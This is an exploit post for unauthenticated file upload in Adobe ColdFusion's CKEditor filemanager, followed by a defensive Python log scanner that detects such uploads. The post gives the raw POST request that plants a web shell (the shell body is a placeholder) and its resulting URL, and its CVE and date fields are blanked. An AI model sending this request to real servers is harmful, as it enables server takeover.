[EXP]Adobe ColdFusion 2018 - Arbitrary File Upload

Time: 2023-02-06 23:35:07
# Exploit Title: Unrestricted file upload in Adobe ColdFusion
# Google Dork: ext:cfm
# Date: --
# Exploit Author: Pete Freitag of Foundeo
# Reversed: Vahagn vah_13 Vardanian
# Vendor Homepage: adobe.com
# Version:
# Tested on: Adobe ColdFusion
# CVE : CVE--
# Comment: September , : Updates for ColdFusion and ColdFusion have been elevated to Priority due to a report that CVE-- is now being actively exploited.

```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
Host: coldfusion:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Content-Type: multipart/form-data; boundary=---------------------------
Content-Length:
Connection: close
Upgrade-Insecure-Requests:

-----------------------------
Content-Disposition: form-data; name="file"; filename="shell_file"
Content-Type: image/jpeg

%shell code here%
-----------------------------
Content-Disposition: form-data; name="path"

shell
-------------------------------
```

A shell will be located here: http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file
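
For defenders, the two requests above leave a recognisable trail in web-server access logs. The following is an added example, not part of the original exploit post: it flags POSTs to the filemanager `upload.cfm` endpoint and any request for a file under `uploadedFiles/`. The combined log format, the function names and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Paths taken from the request and the result URL shown above (lowercased for matching).
FM_DIR = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/"
UPLOAD_ENDPOINT = FM_DIR + "upload.cfm"
UPLOAD_DIR = FM_DIR + "uploadedfiles/"

# Assumption: access logs use the Apache/nginx "combined" format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize(target):
    """Drop the query string, decode percent-encoding, collapse slashes, lowercase."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/+", "/", path).lower()

def scan(lines):
    """Return (kind, ip, timestamp, path, status) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = normalize(m["target"])
        if m["method"] == "POST" and path.startswith(UPLOAD_ENDPOINT):
            kind = "upload-attempt"
        elif path.startswith(UPLOAD_DIR) and len(path) > len(UPLOAD_DIR):
            kind = "uploaded-file-access"
        else:
            continue
        findings.append((kind, m["ip"], m["ts"], path, int(m["status"])))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
P = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager"
SAMPLE = [
    f'203.0.113.7 - - [06/Feb/2023:23:30:01 +0000] "POST {P}/upload.cfm HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    f'203.0.113.7 - - [06/Feb/2023:23:30:05 +0000] "GET {P}/uploadedFiles/shell_file HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [06/Feb/2023:23:31:00 +0000] "GET /index.cfm HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'198.51.100.9 - - [06/Feb/2023:23:32:10 +0000] "POST {P}//%55pload.cfm?x=1 HTTP/1.1" 404 0 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A 200 response to an `upload-attempt` followed by an `uploaded-file-access` from the same client is the sequence to prioritise; on a host that does not use the CKEditor file manager, any hit on these paths is worth reviewing.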